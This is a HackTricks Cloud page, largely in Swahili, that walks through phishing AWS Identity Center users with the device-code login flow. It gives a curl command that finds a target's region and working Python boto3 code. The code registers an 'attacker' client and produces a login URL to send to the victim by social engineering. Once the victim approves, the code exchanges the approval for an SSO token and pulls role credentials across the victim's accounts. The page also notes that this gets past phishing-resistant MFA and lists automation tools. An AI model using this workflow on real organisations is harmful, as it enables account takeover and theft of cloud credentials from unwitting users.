HackTricks CloudAWS - Identity Center & SSO Unauthenticated Enum
Reading time: 5 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
AWS Device Code Phishing
Iliwasilishwa awali katika this blog post, inawezekana kutuma link kwa mtumiaji anayetumia AWS SSO kwamba ikiwa mtumiaji atakubali mshambuliaji ataweza kupata token to impersonate the user na kufikia roles zote mtumiaji anaweza kufikia katika Identity Center.
Ili kufanya shambulio hili masharti ni:
- Mwenyeathirika anahitaji kutumia Identity Center
- Mshambuliaji lazima ajue subdomain inayotumiwa na mwenyeathirika
<victimsub>.awsapps.com/start
Kwa taarifa hiyo tu, mshambuliaji ataweza kutuma kiunganisho kwa mtumiaji ambacho ikiwa kitakubaliwa kitatia mshambuliaji ufikiaji kwa akaunti ya mtumiaji wa AWS.
Shambulio
- Finding the subdomain
Hatua ya kwanza kwa mshambuliaji ni kugundua subdomain ambayo kampuni ya mwenyeathirika inaitumia katika Identity Center yao. Hii inaweza kufanywa kupitia OSINT au guessing + BF kwani kampuni nyingi zitakuwa zikitumia jina lao au utofauti wa jina lao hapa.
Kwa taarifa hii, inawezekana kupata region ambapo Identity Center ilisanidiwa:
curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
"region":"us-east-1
- Tengeneza kiungo kwa mwathirika & Uitume
Endesha code ifuatayo ili kutengeneza kiungo cha AWS SSO cha kuingia ili mwathirika aweze kuthibitisha utambulisho.
Kwa demo, endesha code hii katika python console na usiifunge kwani baadaye utahitaji baadhi ya objects ili kupata token:
import boto3
REGION = 'us-east-1' # CHANGE THIS
AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS
sso_oidc = boto3.client('sso-oidc', region_name=REGION)
client = sso_oidc.register_client(
clientName = 'attacker',
clientType = 'public'
)
client_id = client.get('clientId')
client_secret = client.get('clientSecret')
authz = sso_oidc.start_device_authorization(
clientId=client_id,
clientSecret=client_secret,
startUrl=AWS_SSO_START_URL
)
url = authz.get('verificationUriComplete')
deviceCode = authz.get('deviceCode')
print("Give this URL to the victim: " + url)
Tuma the generated link kwa victim ukitumia social engineering skills zako za ajabu!
- Subiri mpaka victim aikubali
Iwapo victim alikuwa already logged in AWS atahitaji tu kukubali granting the permissions, ikiwa hakuwa, atahitaji login and then accept granting the permissions.\ Hivi ndivyo promp inavyoonekana sasa hivi:
.png)
- Pata SSO access token
Ikiwa victim alikubali promp, endesha code hii ili generate a SSO token impersonating the user:
token_response = sso_oidc.create_token(
clientId=client_id,
clientSecret=client_secret,
grantType="urn:ietf:params:oauth:grant-type:device_code",
deviceCode=deviceCode
)
sso_token = token_response.get('accessToken')
SSO access token ni halali kwa 8h.
- Jifanye kuwa mtumiaji
sso_client = boto3.client('sso', region_name=REGION)
# List accounts where the user has access
aws_accounts_response = sso_client.list_accounts(
accessToken=sso_token,
maxResults=100
)
aws_accounts_response.get('accountList', [])
# Get roles inside an account
roles_response = sso_client.list_account_roles(
accessToken=sso_token,
accountId=<account_id>
)
roles_response.get('roleList', [])
# Get credentials over a role
sts_creds = sso_client.get_role_credentials(
accessToken=sso_token,
roleName=<role_name>,
accountId=<account_id>
)
sts_creds.get('roleCredentials')
Phishing the unphisable MFA
Inafurahisha kujua kwamba shambulio lililotangulia linafanya kazi hata kama "unphisable MFA" (webAuth) inatumiwa. Hii ni kwa sababu workflow iliyotangulia haiondoki kwenye domain ya OAuth inayotumika. Sio kama katika phishing nyingine ambapo mtumiaji anahitaji kubadilisha domain ya login; katika kesi hii device code workflow imeandaliwa hivyo code inafahamika na device na mtumiaji anaweza login hata kwenye mashine tofauti. Ikiwa atakubali prompt, device, kwa tu kutambua code ya awali, itakuwa na uwezo wa kupata credentials za mtumiaji.
Kwa habari zaidi kuhusu hili angalia chapisho hiki.
Zana za Otomatiki
- https://github.com/christophetd/aws-sso-device-code-authentication
- https://github.com/sebastian-mora/awsssome_phish
Marejeo
- https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/
- https://ruse.tech/blogs/aws-sso-phishing
- https://mjg59.dreamwidth.org/62175.html
- https://ramimac.me/aws-device-auth
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.